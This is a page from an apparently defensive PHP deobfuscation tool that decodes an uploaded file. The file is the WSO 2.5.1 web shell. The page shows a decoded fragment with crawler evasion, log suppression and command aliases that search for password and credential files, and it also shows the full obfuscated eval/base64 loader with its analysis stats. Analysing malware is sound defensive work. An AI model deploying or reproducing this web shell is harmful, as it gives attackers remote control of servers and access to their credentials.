Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

<?php /* MMM */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64')..

Decoded Output download


$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler");
if(preg_match('/'.implode('|',$userAgents) .'/i',$_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION','2.5.1');
if(get_magic_quotes_gpc()) {
function WSOstripslashes($array) {
return is_array($array) ?array_map('WSOstripslashes',$array) : stripslashes($array);
}
$_POST = WSOstripslashes($_POST);
$_COOKIE = WSOstripslashes($_COOKIE);
}
function wsoLogin() {
die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
}
function WSOsetcookie($k,$v) {
$_COOKIE[$k] = $v;
setcookie($k,$v);
}
if(!empty($auth_pass)) {
if(isset($_POST['pass']) &&(md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']),$auth_pass);
if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) ||($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}
if(strtolower(substr(PHP_OS,0,3)) == "win")
$os = 'win';
else
$os = 'nix';
$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);
$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\","/",$home_cwd);
$cwd = str_replace("\","/",$cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) .'ajax']))
$_COOKIE[md5($_SERVER['HTTP_HOST']) .'ajax'] = (bool)$default_use_ajax;
if($os == 'win')
$aliases = array(
"List Directory"=>"dir",
"Find index.php in current dir"=>"dir /s /w /b index.php",
"Find *config*.php in current dir"=>"dir /s /w /b *config*.php",
"Show active connections"=>"netstat -an",
"Show running services"=>"net start",
"User accounts"=>"net user",
"Show computers"=>"net view",
"ARP Table"=>"arp -a",
"IP Configuration"=>"ipconfig /all"
);
else
$aliases = array(
"List dir"=>"ls -lha",
"list file attributes on a Linux second extended file system"=>"lsattr -va",
"show opened ports"=>"netstat -an | grep -i listen",
"process status"=>"ps aux",
"Find"=>"",
"find suid"=>"find / -type f -perm -04000 -ls",
"find suid in current dir"=>"find . -type f -perm -04000 -ls",
"find sgid"=>"find / -type f -perm -02000 -ls",
"find sgid files in current dir"=>"find . -type f -perm -02000 -ls",
"find config.inc.php"=>"find / -type f -name config.inc.php",
"find config*"=>"find / -type f -name \"config*\"",
"find config* in current dir"=>"find . -type f -name \"config*\"",
"find writable folders and files"=>"find / -perm -2 -ls",
"find writable folders and files in current dir"=>"find . -perm -2 -ls",
"find service.pwd"=>"find / -type f -name service.pwd",
"find service.pwd files in current dir"=>"find . -type f -name service.pwd",
"find .htpasswd"=>"find / -type f -name .htpasswd",
"find .htpasswd files in current dir"=>"find . -type f -name .htpasswd",
"find .bash_history"=>"find / -type f -name .bash_history",
"find .bash_history files in current dir"=>"find . -type f -name .bash_history",
"find .fetchmailrc"=>"find / -type f -name .fetchmailrc",
"find .fetchmailrc files in current dir"=>"find . -type f -name .fetchmailrc",
"Locate"=>"",
"locate httpd.conf"=>"locate httpd.conf",
"locate vhosts.conf"=>

Did this file decode correctly?

Original Code

<?php /* MMM */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x1333c;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDUwNik7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnRW50ZXJ5b3V3a2hSSFlLTldPVVRBYUJiQ2NEZEZmR2dJaUpqTGxNbVBwUXFTc1Z2WHhaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>~Dkr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXLO0xNWLyHA1SmT09NHeEXHr8Xk10PkrfHT0knTyYdk09NTzEXHeEXTZffhtOuTr9tWAxTBZfNHr8XHr9NHeEmbUILTzEXHr8XTzEXRtONTzEXTzEXHeEpRtfydmOlFmlvfbfqDykwBAsKa09aaryiWMkeC0OLOMcuc0lpUMpHdr1sAunOFaYzamcCGyp6HerZHzW1YjF4KUSvNUFSk0ytW0OyOLfwUApRTr1KT1nOAlYAaacbBylDCBkjcoaMc2ipDMsSdB5vFuyZF3O1fmf4GbPXHTwzYeA2YzI5hZ8mhULpK2cjdo9zcUILTzEXHr8XTzEXhTslfMyShtONTzEXTzEXTzEpKX==tJOjd2xvFJE9wtwjcoC1wjShkoOlcMy1duOgCBY0DB9Vwe0Ik0cpdoazTByVkzShkoOlcMy1duOgfbYlb2yQCbIINUn0FmalKXPLcoaMCbaSfy9jDoyZF2a0we0Ik1fpdMOvf3HsHTw1HUF7tMlMhtyldbn0GUILb1YyAlcyAlSmUyOAAy9aA0aUb0yuOA5Ak10phUn7tJO1F2aZWBfldmOzwe0ICbkZCbLPwLfvd2fScUwSwlYSfbkXwJXJTaYKWM90wJXJDBygCbkjDol2cbwJRtkcCB5LcbIJRtkUCB1JdoaZwJL7tMlMhunZcBfgdBy0C2IPkZ8mRMlsFoxvcoAPk3XmRtO1F2aZWBfldmOzhUEVkZ9pkZXLb1YyAlcyAlSmUyOAAy9aA0aUb0yuOA5Ak10phUn7tMilCBOlFJImUyOAAt8xRjEIYeE0wr5vftnod3aVctFpKXplGol0KXp9tm0hWolVDa9zcbWPk2aZFM9Zb2xvcZFSTlaHTtL7tLnpdMlgF2a0htfSd2fgcbkZd3kzkZXXhTShWolVDa9zcbWPk21iGy9lGoajfbOpd25gfolscUFSHtL7tLnzcbOgfolsca9SDB1pftIXhTShWuYlfy9sCBfpC19xfB90cbYgFmaVfolscUIXhTShWoOlcMlVcUIma1YNb1cyAlYkT04mRtFZRjAVHUFpKXppcJimcbOgdBymDBYgFbavfoazb2fXCZIphUn7tMc1dMY0DB9VwyfTT3Y0FMlXF2xiF2ilFZILCbkZCbLpwuShFMa0fbkVwolzb2yZFMy5htOiFmkiGULIN2yZFMy5b21iFtIma1YNF3OZDbnzdoyzDoazkZXLCbkZCbLpwePIF3OZDbnzdoyzDoazhtOiFmkiGUL7tm0hky9WT1YAwe0Ia1YNF3OZDbnzdoyzDoazhtOgAr9TatL7tJOgW09NU0lywe0Ia1YNF3OZDbnzdoyzDoazhtOgW09NU0lyhTShgWpMfB5jfolvdJn3F29Hd2fpdJIpwuShcollhtw8FuklwoySDBfVNBYldmOlFj48cM9ZdUnscbOPd2W9Fo9zfe5WCbYzf29ZcePINolVFua0wuO5FoA9FoyzF3fvFMWIdMyscT1XCbYzNjxpdmn1ftn0GbnlNbY1CM1pftn2CBx1cT0mNj4mNjXvcM9ZdT48R3nZcT4JhTShgWpMfB5jfolvdJnbA09zcbOjd29qDBAPkoSSkuCpwuShky9eT09RUAadkosfwe0IkuC7tmYlfoYvd2spcUILDZXLfJL7tm0hDBCPwBasFuO5htOifbOPb3niF3HphUn7tMlMholzF2a0htOgAr9TaySmFoyzFZffhUEMkJisceAPky9WT1YABZfXCbYzk10pwe09wtOifbOPb3niF3HphWpbA09zcbOjd29qDBAPdBW1htOgA0aUaLaUBZfwayOWb0iNA1WmbULSkoy1foigFoyzFZL7tMlMwtIiDbYzcbWPky9eT09RUAaddBW1htOgA0aUaLaUBZfwayOWb0iNA1WmbUlfhUn8gtILb0YNT0skOassceAPky9TOakBOakdk0iAayngUr9Tatffha0IwT0Ikoy1foigFoyzFZLptmfzd0xvc2lVhtL7tm0hDBCPF3OZfo9Sd3flFJizfBkzfuwPAriWb09TReESHZLpwe09wtk3DB4JhWPLd3HINUEmf2lVkzShcBxzcWPLd3HINUEmdMl4kzShkuYicMagdB9LcUE9wrnpdMlgc2a0htfzCBclb21vcoAmhTShDBCPwUOzCBclb21vcoAptMaZFM9Zb3klFo9ZfolVcZIXhTShkoOpF2yJdoagcmaVC3Opd25zwe0IWolVDa9mcbWPk2OpF2yJdoagcmaVC3Opd25zkZL7tJOPd21lb2Y3ctE9wrnmcbOjf2WPhTShDBCPDbYzcbWPky9WT1YABZfjk10phWpEC2iLDbwPky9WT1YABZfjk10pKXPLC3fLwe0IWoflfoY3ctIpKXppcJILd3HINT0Ik3fpdJFpwuShkoivdBagC3fLwe0IF3OZb3klFoxiC2APwlxFwJXJRZwSkoivdBagC3fLhTShkoY3ctE9wuY0Fl9ZcbnSCBYlhtkFbtwSwJ8JRtOjf2WpKXp9tMlMhtOjf2OdF3OZdoaVhtOjf2WpRTyfwtr9wtFvkZLhkoY3ctEVNUEmRZF7tMlMhtypF3YlftILb0YNT0skOassceAPky9TOakBOakdk0iAayngUr9TatffhUEVk2yQCbImbULptJOgW09NU0lyB21LYUILb1YyAlcyAlSmUyOAAy9wT1YAk10pwt4mCBpiGtffwe0Ihokvd2XpkoOlcMy1duOgfbYlb2yQCbI7tMlMhtOv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

Function Calls

fopen	1
fread	3
strtr	2
fclose	1
urldecode	1
str_replace	1
base64_decode	3

Variables

$O000O0O00	True
$O0O000O00	fgets
$O0O00OO00	fread
$OO00O0000	78652
$OO00O00O0	$color = "#df5"; $default_action = 'FilesMan'; $default_use..
$OOO000000	fg6sbehpra4co_tnd
$OOO00000O	strtr
$OOO0000O0	base64_decode
$OOO000O00	fopen
$OOO0O0O00	index.php

Stats

MD5	ca2f069128a0afed556bd654290e31df
Eval Count	3
Decode Time	169 ms

Find this useful? Enter your email to receive occasional updates for securing PHP code.

PHP Decode

Decoded Output download

Did this file decode correctly?

How would you describe this file?

Original Code

Function Calls

Variables

Stats